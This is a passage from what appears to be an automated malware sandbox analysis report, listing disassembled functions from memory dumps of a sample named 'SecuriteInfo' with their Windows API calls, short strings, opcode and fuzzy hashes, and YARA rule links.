                          APIs
                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,02896921,?,?), ref: 02896AC8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142688034.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          • String ID:
                          • API String ID: 2591292051-0
                          • Opcode ID: ed58cdf0032dc058d5f440837244e1cc2f188450821710702fb8f74e6705d12e
                          • Instruction ID: 6d9521b465a1c36e12bef778316ac5b4935e4e81dbdaebead7bc45a0f0aebefc
                          • Opcode Fuzzy Hash: ed58cdf0032dc058d5f440837244e1cc2f188450821710702fb8f74e6705d12e
                          • Instruction Fuzzy Hash: 211128B5800359CFDB20DFA9C948BEEBBF4EF48320F14845AD558A7641D738A584CFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02891308 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142688034.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: bd799f76a658671dd76873ec865f99c4c2b4c6cbaa2990e20544572fa1984d2b
                          • Instruction ID: 1f25ae6fe7b72f6b11652574cd523b2957427f6fe96c2fe7111b3f77eaae2298
                          • Opcode Fuzzy Hash: bd799f76a658671dd76873ec865f99c4c2b4c6cbaa2990e20544572fa1984d2b
                          • Instruction Fuzzy Hash: 9E113A75D003498FDB20DFAAC84979EFBF4EF88324F148419D519A7240CB796944CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02894088 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 028940ED
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142688034.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: f7f3ad513720371c348bacca2a647709272012e1b1adfad82bfc62c46829e366
                          • Instruction ID: 4d6d126558a609e8ecd16941a9f4f944a29e05ab3764fcee6c2a328586cfca9e
                          • Opcode Fuzzy Hash: f7f3ad513720371c348bacca2a647709272012e1b1adfad82bfc62c46829e366
                          • Instruction Fuzzy Hash: D411F5B98003499FDB10CF99D988BDEBFF8EB49320F148459D559A7211C375A944CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0287B218 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0287B27E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142626073.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2870000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 4eb71963405661b571303e610ff959fd39a844978e1bfb1f3560718a68887130
                          • Instruction ID: 90cbf20fe1f87b514b2cdefa16a65807beefafdc6a27689dadd2d35f74139de7
                          • Opcode Fuzzy Hash: 4eb71963405661b571303e610ff959fd39a844978e1bfb1f3560718a68887130
                          • Instruction Fuzzy Hash: 491113BAC013498FCB20CF9AC844ADEFBF5EB88314F10841AD419A7610C379A545CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02894090 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 028940ED
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142688034.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 029267833848b21d91d82a3bf80b25e2de43ab5c1f9a09fe764820fb2d7e7312
                          • Instruction ID: 1f54bddcadb683a0b15d0466efa949eccb520e7ef274adca1c7f8abbe4b09596
                          • Opcode Fuzzy Hash: 029267833848b21d91d82a3bf80b25e2de43ab5c1f9a09fe764820fb2d7e7312
                          • Instruction Fuzzy Hash: 031103B98003499FDB10CF9AC988BDEBBF8EB48320F148419D518A7201C375A944CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE4D68 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq
                          • API String ID: 0-3943945277
                          • Opcode ID: 3408c7c61616256532dd1d9e11034d3731cae09da81d7af7d3a6dfad5285610d
                          • Instruction ID: bf39b8440c7ba95c2fddc498db7e52bd1b2b429d07fdbb3898b991d58ec26316
                          • Opcode Fuzzy Hash: 3408c7c61616256532dd1d9e11034d3731cae09da81d7af7d3a6dfad5285610d
                          • Instruction Fuzzy Hash: 3551F131B04B944BDBAAEA3A885472F7BF7AFC1610F04846DD5428B392DE68DA41C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE6980 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID: d8jq
                          • API String ID: 0-124307943
                          • Opcode ID: 611c3b3ac878a97895b4353c04f71821b2b0062d7fbc976576f881acafaded90
                          • Instruction ID: fbec00161472925ec57fd5a9533345c3844f3671e4995557d36659facf409f59
                          • Opcode Fuzzy Hash: 611c3b3ac878a97895b4353c04f71821b2b0062d7fbc976576f881acafaded90
                          • Instruction Fuzzy Hash: B8616E35F201199FDB54DF6AD855AAE7BF2EF88715F248469E802AB390CB70DD40CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 07143920 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147443822.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: true
                          • Associated: 00000000.00000002.2147410922.0000000007130000.00000004.08000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7130000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID: O};5
                          • API String ID: 0-3558557551
                          • Opcode ID: ce7bffa18e2bb71966dd9625f48e80877a42614cd7f8d37bbfc9b67f5dca48bb
                          • Instruction ID: 1b9e43678b466c549729f87a5179b5631d7dccd64057e4480e15a0214900a25d
                          • Opcode Fuzzy Hash: ce7bffa18e2bb71966dd9625f48e80877a42614cd7f8d37bbfc9b67f5dca48bb
                          • Instruction Fuzzy Hash: 38418DB0A15609EFCB44CF99D9849AEBBB2FF89300F60D895C159E7398D3349A51CB14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE32B0 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq
                          • API String ID: 0-3943945277
                          • Opcode ID: 9a7414fb0f6a292c1a8f17e018538f96e279d4f17e270d214919fbd1a1677d6e
                          • Instruction ID: e1e4b89294426a23753a1e6b3f1a6057353b941701ec618035c6385d9806067a
                          • Opcode Fuzzy Hash: 9a7414fb0f6a292c1a8f17e018538f96e279d4f17e270d214919fbd1a1677d6e
                          • Instruction Fuzzy Hash: C8314231700A144BC75ABB28D84465FBBB7EFC13107448E6DE04A8B382DE76AE078BD5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE6700 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID: Hiq
                          • API String ID: 0-3823623015
                          • Opcode ID: 12278519b34769b679942829ed9820906d604cfe56d3668b41663433b5cbe354
                          • Instruction ID: 68a658480afc0f810dd9592b97b55bb9c90e4851138e0954661b93ec54288dea
                          • Opcode Fuzzy Hash: 12278519b34769b679942829ed9820906d604cfe56d3668b41663433b5cbe354
                          • Instruction Fuzzy Hash: 5A21F074A14244AFEB45AF758C06BAE3FB6EB94300F1084AAE509DB2C0DF359E458B91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE6710 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID: Hiq
                          • API String ID: 0-3823623015
                          • Opcode ID: 10af7ce32ed3ac5e97b2c27aa0cd39e2082aa6e60cbcc6eabf97e828b3f7b3c5
                          • Instruction ID: 0fc6567cf36b0a786feafdf1e9e9b852c52fa97af8a2d4c346a02ab252fb282b
                          • Opcode Fuzzy Hash: 10af7ce32ed3ac5e97b2c27aa0cd39e2082aa6e60cbcc6eabf97e828b3f7b3c5
                          • Instruction Fuzzy Hash: D221D274A14208AFEB44AB758C46BAE7FBAEB94300F108065E509EB2C0DF349E458BD1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE16B8 Relevance: .1, Instructions: 149COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: addc3190afde9146445e3c550f683377d710430076e56aaa7cb30d4f271ee581
                          • Instruction ID: ed2fbebd91db398e71c57c69862635e16f9778f9d7c411f98a3676cb7b071ffa
                          • Opcode Fuzzy Hash: addc3190afde9146445e3c550f683377d710430076e56aaa7cb30d4f271ee581
                          • Instruction Fuzzy Hash: 2A51C135B002048FD715EB68D854AAEBBF6EF89704F1844AAD10AEB751CB75EC41CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE4080 Relevance: .1, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9a28c094c89eb38cac383294d8e3fe6b2e18a17c80e0c87e1a1bef3fe0358603
                          • Instruction ID: 902ae1d9fd872ad364c57856761285ac7cb45eb515215de801e4f84dfc67ee8e
                          • Opcode Fuzzy Hash: 9a28c094c89eb38cac383294d8e3fe6b2e18a17c80e0c87e1a1bef3fe0358603
                          • Instruction Fuzzy Hash: 7D41E630700B944BDBAEEB3A885072FBBF7AFC1614F04881DD08287791CE64D941D791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE4E09 Relevance: .1, Instructions: 122COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 97de406a008f3a9901fbf4c39ce4031e3f25bb617f61d50de37cd53794d320a8
                          • Instruction ID: c14a32b90e3526a6d8253ba580f801c70b47fdbb12f27f3881013b56b49f23bf
                          • Opcode Fuzzy Hash: 97de406a008f3a9901fbf4c39ce4031e3f25bb617f61d50de37cd53794d320a8
                          • Instruction Fuzzy Hash: 9141D531704B904BDBAADB3A885072FBBF7AF81614F04896DD0828B792CE75DD41D791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE7247 Relevance: .1, Instructions: 117COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 81699b60b1f76c0fbaab3ffcbda6482c2da65986cf25846f2700c30d731cc379
                          • Instruction ID: 5e99e54fbd6bd54a36e1ce5a055b4199fc02efa6dc61027a1fc19de462b2fa6f
                          • Opcode Fuzzy Hash: 81699b60b1f76c0fbaab3ffcbda6482c2da65986cf25846f2700c30d731cc379
                          • Instruction Fuzzy Hash: 01412775A1011A9BEF459F64D885AAE7BB7FF84310F148029FC0297294CB34DD92CBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE2D20 Relevance: .1, Instructions: 94COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2dd833393bd95c118fe9467683a70f8c61f9f6d330ca141dbd3f1d63052a2aa0
                          • Instruction ID: 7530dafa7828af105fb781090bbc09de9a03eae78fcb135bcc45a81629830d35
                          • Opcode Fuzzy Hash: 2dd833393bd95c118fe9467683a70f8c61f9f6d330ca141dbd3f1d63052a2aa0
                          • Instruction Fuzzy Hash: A821DF357143448BE7A95B3A949822ABBFBAFC4354F15882DE947C77C1DE70D84483A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE3431 Relevance: .1, Instructions: 89COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d4369cd8f654f14dd9e453278ffc28d390a6c94749865eef5cc65a263701a215
                          • Instruction ID: b2e7ebebfd62ec904b922911051d3c307d64138b68c01430b7d9f0b1e92f2c51
                          • Opcode Fuzzy Hash: d4369cd8f654f14dd9e453278ffc28d390a6c94749865eef5cc65a263701a215
                          • Instruction Fuzzy Hash: 33314D74700B408FC799DB6AC99451ABBE6FFC83107548A6ED54BCB7A6DF70E8018B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CEE948 Relevance: .1, Instructions: 81COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 27eb2412308ee0b842d9281b9436354f95b95022f4c9dbc5885e62d09cd18aad
                          • Instruction ID: 87dba72d73e593d5b8d2a2e0b2f36dec9d907695b972c5f825f24adb4bf18863
                          • Opcode Fuzzy Hash: 27eb2412308ee0b842d9281b9436354f95b95022f4c9dbc5885e62d09cd18aad
                          • Instruction Fuzzy Hash: F531CE71A05259CFD7908BFAD8856BAFBF0FB08390F04426FE56597691C3389948C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DD4C4 Relevance: .1, Instructions: 75COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142358455.00000000027DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27dd000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dae9df6d519f3e027def7fcaf8e8f7ac3b31a3fac123c4fd2cd9b67abfa208d6
                          • Instruction ID: c5f3d7bb0ef1e3e8be73bc2ced23eda86cfea1ec5aa5d759e9633f84d70cf5b7
                          • Opcode Fuzzy Hash: dae9df6d519f3e027def7fcaf8e8f7ac3b31a3fac123c4fd2cd9b67abfa208d6
                          • Instruction Fuzzy Hash: 292107B2504240DFDB25DF14D9C0F26BF75FB88328F24C569E90A1B256C336E456CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CEC1B8 Relevance: .1, Instructions: 75COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: deaaf9f21e913a7779ad8f1a2e321a183dd1d2e94ad1912a19288bde7866f8ea
                          • Instruction ID: 9163951e14e964480d98273d7d02f53fd0317449563d8ccd94860b16f55341f1
                          • Opcode Fuzzy Hash: deaaf9f21e913a7779ad8f1a2e321a183dd1d2e94ad1912a19288bde7866f8ea
                          • Instruction Fuzzy Hash: DD213571A04611CFE7508BEADD853FA73B1FB91311F04823BE576CA294D338D645C291
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027ED01C Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142408094.00000000027ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 027ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 749268f62a474190d47293da0cd7e9a061dff175a45d739f5b2d69c4ebecf649
                          • Instruction ID: 63c1be340d2c3c443d0b0b369138c860431d52a16ad959e2cf76add43fb06d0e
                          • Opcode Fuzzy Hash: 749268f62a474190d47293da0cd7e9a061dff175a45d739f5b2d69c4ebecf649
                          • Instruction Fuzzy Hash: 1C21D075604204DFDF25DF14D984B26BB69EB88324F28C969D80A4B246C33AD806CA71
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027ED1D4 Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142408094.00000000027ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 027ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 103cea5169961ed86621f59ae833a6e936fb3900311cb95867836a5af3442007
                          • Instruction ID: 668673f1f8d89a7ebad595499c20707e5bb1e97f33e391fd1626da048eca0217
                          • Opcode Fuzzy Hash: 103cea5169961ed86621f59ae833a6e936fb3900311cb95867836a5af3442007
                          • Instruction Fuzzy Hash: 2321D375504200DFDF25DF54D980B26BB6DFB88324F24C56DD80A5B296C336D406CA71
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE6DA8 Relevance: .1, Instructions: 71COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: de284accefbdd7aaa4aea7bbf9800411470504ea60bae33f212e0a6aee1ddd02
                          • Instruction ID: 7d045180d5bbf66e17a0d711e68f566a2ed97e682acbd74a747fd381909d17b5
                          • Opcode Fuzzy Hash: de284accefbdd7aaa4aea7bbf9800411470504ea60bae33f212e0a6aee1ddd02
                          • Instruction Fuzzy Hash: 0D21A135B142468FCB50DF79C894A6E7BB1AF59210F1544A9E905DB3A1D730ED80CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE39DC Relevance: .1, Instructions: 65COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2f466a2327f5bd088f1d9a098cd782b6da70e35077cb345d569dea10c66a3561
                          • Instruction ID: 6ca6b9de71e3fa087e9dd767963460b564d1602299c7e1fe9fd5cdf19559d988
                          • Opcode Fuzzy Hash: 2f466a2327f5bd088f1d9a098cd782b6da70e35077cb345d569dea10c66a3561
                          • Instruction Fuzzy Hash: 1821F535A501048FCB94CFA8CA859EDBBF2FF48310B2546AAD419EB361D731EE41CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE6970 Relevance: .1, Instructions: 65COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 75fa15b5d6265dec9ee06ce886449a0a48a58307fd6773d78420ed65554136e9
                          • Instruction ID: 3982d847fc4114aea0f5fd494ff9ab8c96f322598d83750e5a64f033970a2019
                          • Opcode Fuzzy Hash: 75fa15b5d6265dec9ee06ce886449a0a48a58307fd6773d78420ed65554136e9
                          • Instruction Fuzzy Hash: 60213935A10109DFDF04DFA9D945ADDBFB1EB48325F104029E901BB2A0CB719D90CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 07143848 Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147443822.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: true
                          • Associated: 00000000.00000002.2147410922.0000000007130000.00000004.08000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7130000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e63147b51e9d5eaa23bda901abaf49afe0874e12e8390a919956a0c4aec7ae92
                          • Instruction ID: 7ebed23027b4dff63d2cdc363309d173494bafc62cfb7e062b5e8ab1c8a87290
                          • Opcode Fuzzy Hash: e63147b51e9d5eaa23bda901abaf49afe0874e12e8390a919956a0c4aec7ae92
                          • Instruction Fuzzy Hash: 8A2190B4A01A08DFC744DF5AE08499DBBF1FF8C310F5280D5DA489B265D735AAA5CB01
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027ED007 Relevance: .1, Instructions: 61COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142408094.00000000027ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 027ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 88a8cf9c1dfd14cfb12f77d88dfdf979a6df8d57a52207034d32c2c1f28a1416
                          • Instruction ID: c9523533e461fbcc0d86ec355215d31c9492b97279d87612ac1b0840c39ef06b
                          • Opcode Fuzzy Hash: 88a8cf9c1dfd14cfb12f77d88dfdf979a6df8d57a52207034d32c2c1f28a1416
                          • Instruction Fuzzy Hash: B2216F755093C08FDB12CF24D994715BF71EB4A214F28C5DAD8498F6A7C33A980ACB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CEC2D8 Relevance: .1, Instructions: 60COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 54743b9cee499df249e88af6c2d3e5084940d4afe080cfcc92155ed401bdfc07
                          • Instruction ID: 35d57008fb967efb51986aee4861bd869697617620de80b350fd3d2c914cf705
                          • Opcode Fuzzy Hash: 54743b9cee499df249e88af6c2d3e5084940d4afe080cfcc92155ed401bdfc07
                          • Instruction Fuzzy Hash: D4115770E00684AFD7805BBA9C0A7EA7BB2EF85710F04856AE625D72C1D73445018791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE39F0 Relevance: .1, Instructions: 59COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 734cbe41738667ca920827d44cdcc367d0e16d8df206584d961d2098c3f8d518
                          • Instruction ID: 694dc7b0e118abe24383b02824addfa0e2e37880f4e8f15d5bf78588bc3af2f1
                          • Opcode Fuzzy Hash: 734cbe41738667ca920827d44cdcc367d0e16d8df206584d961d2098c3f8d518
                          • Instruction Fuzzy Hash: 9C21B734A401049FCB54DFA9C5849ADBBF2EF88310B2445A9D419AB361D731AE41CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE2B34 Relevance: .1, Instructions: 57COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b54033910f0b7c52fb064bd527d17eecfcf2cb01cda060f240f69ce223312f3c
                          • Instruction ID: 5f0fea487af6c147a507cd155826aa414923cc49f314c8b7b86b1967a2fdcb8d
                          • Opcode Fuzzy Hash: b54033910f0b7c52fb064bd527d17eecfcf2cb01cda060f240f69ce223312f3c
                          • Instruction Fuzzy Hash: AA119071200B149BC656EB29D88065FBBB7EFC0310B408E1CE1464B696DFB5BA468BD5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DD4BF Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142358455.00000000027DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27dd000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                          • Instruction ID: 0fa088722aea4858c90494c4e650a0c6e0f77a9121a84f67ec56678a467611a9
                          • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                          • Instruction Fuzzy Hash: E211E676504280DFCB16CF14D5C4B16BF72FB84328F24C6A9D84A0B656C33AD45ACBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027ED1CF Relevance: .1, Instructions: 53COMMON
